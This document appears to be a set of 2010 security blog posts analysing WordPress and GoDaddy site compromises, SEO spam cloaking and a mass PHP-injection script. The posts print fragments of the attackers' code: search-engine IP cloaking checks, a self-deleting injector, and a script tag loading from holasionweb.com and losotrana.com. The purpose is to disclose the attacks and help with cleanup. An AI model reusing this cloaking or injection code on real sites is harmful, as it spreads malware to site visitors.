SEO SPAM network – Code used and more details

Lately we have been talking a lot about WordPress sites getting hacked with SEO Spam:

1-SEO SPAM network – Details of the wp-includes infection
2-It is not over – SEO Spam on sites infected

Some big sites got infected and the common complain I hear is that even after they clean up the SPAM, it just “magically” reappears after a few days.

Infection and analysis

*This is important: The latest version of WordPress (2.9.2) is not vulnerable, but if you took a while to upgrade, your site might have been hacked in the past and they left a backdoor hanging in there. So you need to find where it is.


Read More

SEO SPAM network – Details of the wp-includes infection

We have been digging lately in a large SEO SPAM network which is using thousands of compromised sites to increase their page rankings and spread malware. They are similar to the one we reported earlier affecting lean.mit.edu, but this time they seem focused only on WordPress web sites.

Sites compromised.

The list is big. Some of the ones that catched my eyes were:

Mindtouch.com (Popular open source product)
chapters.asmconline.org (American Society of Military comptrollers)
blog.woodward.edu (university)
content.hks.harvard.edu (university)
cima.ned.org (National Endowment for Democracy)
scripts.mit.edu
web.mit.edu
badminton.mit.edu
people.oregonstate.edu
whi.wts.edu
blogs.hartwick.edu
virtualcms.net

And the list goes on and on and on…
Read More

XSS on oswd.org (Open source Web design) used by spammers

http://www.oswd.org/ (Open Source design) is a popular web site used for sharing templates and web designs. They have a strong and active community and we actually used that in the past when looking for templates.

However, we started to notice lately a lot of spammers using the oswd.org site for hosting their content. Instead of having links to a viagra or a cialis web site, they were linking directly to random oswd profiles. For example:

http://www.oswd.org/user/profile/id/52781 or
http://www.oswd.org/user/profile/id/52780 or
http://www.oswd.org/user/profile/id/52792

*There are hundreds of profiles within the 526-528 range being used for that. If you search on twitter for “user profile” “oswd” you will find a bunch as well.
Read More

Here we go again – Problem at GoDaddy continues

Update from GoDaddy: Less than 200 accounts hacked this morning as they were able to contain it before it spread. On their own words:

Compromised Website Update 5/20/10 – An attack impacting less than 200 accounts happened this morning.

Go Daddy is working with other top hosting providers and security experts to gather information to stop to the criminals initiating these exploits.

We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.

As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.

Thank you, Todd Redfoot, Chief Information Security Officer

Original post: Yes, this is serious. GoDaddy has not fixed their problems yet. Just a few hours ago, we started to notice A LOT of sites reinfected with the “losotrana” malware.
Read More

All the sites at the Walmart Community network hacked

We posted a few weeks ago that the main site for the Walmart community network was hacked. Well, the problem is a lot bigger than that.

They have web sites for different cities and most of them are hacked too. For example:

  • http://arkansas.walmartcommunity.com/ (65.61.140.162) – SEO spam
  • http://florida.walmartcommunity.com ( 65.61.167.225) – SEO spam (only visible to google)
  • http://chicago.walmartcommunity.com ( 65.61.140.161 ) – SEO Spam
  • http://chicago.walmartcommunity.com/wp-includes/8pmax/ – Fake AV (when coming from google
  • http://philadelphia.walmartcommunity.com/ ( 65.61.167.225 ) – SEO Spam

And probably every one of them, since I just checked the ones from their front page. But they are all using WordPress 2.8.4, hosted a Rackspace and configured the same way.


Read More

Lean.mit.edu hacked and serving spam

Interested in Viagra, Cialis and some other “magical” medications? It seems that the MIT web site for the Lean Advancement Initiative (http://lean.mit.edu/ ) knows a bit about it:


Joking aside, they got hacked and are being used to serve a lot of SPAM. In fact, we were fixing a web site that had a lot of links to it:

original viagra bestellen 
original viagra rezeptfrei
viagra droga generica
..
viagra verpackung
cialis filmtabletten
viagra kaufen test
viagra original preis
günstig viagra

The script is also a bit clever, so if you visit it without any argument, it returns a 404 (try http://lean.mit.edu/blind/products/lesat/lesat.php ).
If you visit with an argument, it shows the spam: (try http://lean.mit.edu/blind/products/lesat/lesat.php?pills=bestellen-viagra )


Read More

Continuing attacks at GoDaddy – Losotrana.com

And it is still not over. Remember the code we found last week that was hacking all the PHP files at GoDaddy?

It is still happening, but now using the losotrana.com domain ( http://losotrana.com/js.php ). This is the script that will show up on your site if you get hacked:

<script src=”http://losotrana.com/js.php”></script>

Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:

http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html

You can clean up using this script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

All the sites so far hosted at GoDaddy. If you are signed up with us, our system should have already alerted you (or it will do so very soon). Again, this is not YOUR fault! GoDaddy admitted they have a problem, but it looks like they were not able to fix it yet.

A curiosity is that this Losotrana.com site is hosted at the same domain as holasionweb.com used on the previous attack:

$ host holasionweb.com
holasionweb.com has address 188.165.200.96
$ host Losotrana.com
Losotrana.com has address 188.165.200.96

Also, all domains used on the latest attacks were registered by the same person:

Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

The requests to infect all the files are coming from: 178.32.42.1, which is also faking Google’s referer:

178.32.42.1 - - - "GET www.x.com/simple_production.php HTTP/1.1" 200 57 "-" 
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Update: GoDaddy FTP server seems to be down.

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Reply from GoDaddy regarding the latest attacks

GoDaddy just sent us an update. I am glad they are now acknowledging that they have a problem and are looking to fix it. They didn’t give more details to avoid revealing too much and helping the attackers.

No more blaming the users! I am glad with this response and hopefully they will find out what is going on and fix it.

“Early into our investigation, Go Daddy noticed a majority of exploited websites were all running WordPress. After feedback from customers, more attacks and more in-depth analysis, we modified our statement to specify the attacks targeted numerous PHP-based applications, which included WordPress.

Transparency is a core value at Go Daddy. We intend to continue our commitment to communications. There are times, however, when publicly revealing too much, such as specific code from the attack, helps the criminals causing the issue.

We are aggressively collecting data to see how the attack is maturing and to discover ways we can help prevent our customers from being impacted and shut down ‘the bad guys’ altogether. Go Daddy is leading an ongoing effort, working with industry security experts and other top hosting providers.

As part of our investigation, Go Daddy is encouraging customer input about their related website issues, which is why we set up a special form: http://www.GoDaddy.com/securityissue.

Look for further updates from Go Daddy on this topic, at http://Community.GoDaddy.com/support

- Todd Redfoot, Go Daddy Chief Information Security Officer”

Transparency is important and hopefully when they find out what happened they will do a full case study so we can all learn from that (or am I dreaming too much?)

It is not over – SEO Spam on sites infected

Did your site got hacked on the last 3 or 4 weeks? If it did, you may still have some things to clean up.

We lately started to notice in a lot of sites that we have been fixing a “.files” directory full of spam links on them. We initially thought it was some isolated incident, but then it became more often and we decided to put our scanner to work to see how many we could find.

So far, we got a list with more than a thousand sites with that (to be exact, 1,125 sites so far). These are just sites we have scanned on the last few hours, so the number is probably way bigger. Also, in our list we have sites from all major hosting companies and all web applications. So nothing specific to one company/tool.

How to find out if you are still infected? Via FTP, just list the .files directory on your web root:

.files$ ls
1 in 5 divorces refers to facebook.html
2000 year old man.html
2009 kennedy center honorees.html
2009 pro bowl.html
..
2009 pro bowl roster.html
2009 pro bowl selections.html
2010 nfl pro bowl selections.html

You will see hundreds of files in there. Via a browser, just visit http://yoursite.com/.files/

If you see a directory listing full of links you don’t know about, it means that you are still infected.

For people using our scanner, it has been alerting about that since a little while, so you were (or will be notified) soon.

Now, you ask me. Why were these files added in there? They are being used as a SEO Spam tactic to increase the page rank of the attackers sites.

They are used in conjunction with this code: MW:SPAM:S2 where it reads the content of the file only if it is being requested by a search engine:

function get_page($key){
$f_n=".files/".$key.".html";
if (@file_exists($f_n)) return @file_get_contents($f_n);

Code to check if it comes from a search engine:

$ip=sprintf("%u",ip2long($_SERVER["REMOTE_ADDR"]));
if (($ip>=3639549952)&&($ip<=3639558143))$searchengine=1; //GOOGLE (216.239.32.0-216.239.63.255)
if (($ip>=1123631104)&&($ip<=1123639295))$searchengine=1; //GOOGLE (66.249.64.0-66.249.95.255)
if (($ip>=1089052672)&&($ip<=1089060863))$searchengine=1; //GOOGLE (64.233.160.0-64.233.191.255)
if (($ip>=1078218752)&&($ip<=1078220799))$searchengine=1; //GOOGLE (64.68.80.0-64.68.87.255)
if (($ip>=1078220802)&&($ip<=1078222031))$searchengine=1; //GOOGLE (64.68.88.2-64.68.92.207)
if (($ip>=1087381508)&&($ip<=1087382952))$searchengine=1; //GOOGLE (64.208.32.4-64.208.37.168)
if (($ip>=3512041472)&&($ip<=3512045567))$searchengine=1; //GOOGLE (209.85.128.0-209.85.143.255)
if (($ip>=1113980928)&&($ip<=1113985023))$searchengine=1; //GOOGLE (66.102.0.0-66.102.15.255)
if (($ip>=1208926208)&&($ip<=1208942591))$searchengine=1; //GOOGLE (72.14.192.0-72.14.255.255)
if (($ip>=1249705984)&&($ip<=1249771519))$searchengine=1; //GOOGLE (74.125.0.0-74.125.255.255)
if (stristr($_SERVER["HTTP_USER_AGENT"],"msnbot")||stristr($_SERVER["HTTP_USER_AGENT"],"Yahoo"))$searchengine=1;
if (stristr($_SERVER["HTTP_USER_AGENT"],"via translate.google.com"))$searchengine=0;
if (stristr($_SERVER["HTTP_USER_AGENT"],"Google WAP Proxy"))$searchengine=0;
if (stristr($_SERVER["HTTP_USER_AGENT"],"Google CHTML Proxy"))$searchengine=0;

Now, If a normal user visits it, they are just redirected to cnn.com and won’t really notice something wrong with it.

Clean up:

If you have this .files directory, go ahead and remove it. Also, search your main directory for a PHP file (random name) with a big base64 string. Go ahead and remove it as well.

*If anyone want the lists of sites (for research purposes only, let me know).

**btw, that has nothing to do with GoDaddy. On my list we have sites from all major hosting companies.

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Found code used to inject the malware at GoDaddy

Update: Reply from GoDaddy: http://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html

While GoDaddy was busy blaming its users, one of our friends, K evin Reville, got tired of getting hacked and setup a cron script to monitor his site and alert him when new files were added.

What did he found? He found the malware used by the attackers to infect everyone.

Just to be clear: Nothing to do with WordPress. In fact, in one site we were monitoring, nothing got logged related to WordPress, except this script being called and then deleted. We also saw Joomla sites getting hacked and many other web applications.

So what is going on? The attackers are able to create this single PHP file on all the sites and then remotely execute it to infect everything. Once it is done, the script deletes itself.

Analysis:

The script in this situation was called “simple_production.php” (but we heard reports of different names being used). It is a base64 decoded file that looks like this: (see it in full MW:SIPRO:1)

eval(base64_decode(“DQpzZXRfdGltZV9saW1pdCgwKTsNCg0KDQpmdW5jdGlvbiBpbmplY3….

Decoded, this is what it does: (see the full content here)

1-First, removes itself:

$z=$_SERVER["SCRIPT_FILENAME"];
@unlink($z);

2-Encodes the javascript:

$cod=base64_encode(‘< script src=”http://holasionweb.com/oo.php”>
$to_pack=’if(function_exists(\’ob_start\’)&&!isset($GLOBALS[\’mr_n..

3-Scan all directories and add the malware to all php files. After that, prints the number of infected files and exits:

$val=dirname($z);
$totalinjected=0;
echo “Working with $val\n”;
$start_time=microtime(true);
if ($val!=””)inject_in_folder($val);
$end_time=microtime(true)-$start_time;
echo “|Injected| $totalinjected files in $end_time seconds\n”;

So a simple PHP script is doing all this mess. The issue now is how are they able to inject this file on all those sites at GoDaddy. Permissions on most of the sites we checked were correct. It is not a web application bug. What is left is an internal problem at GoDaddy.

If you are a GoDaddy customer that got hacked, send this link to them. Let’s hope for a good response this time.

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.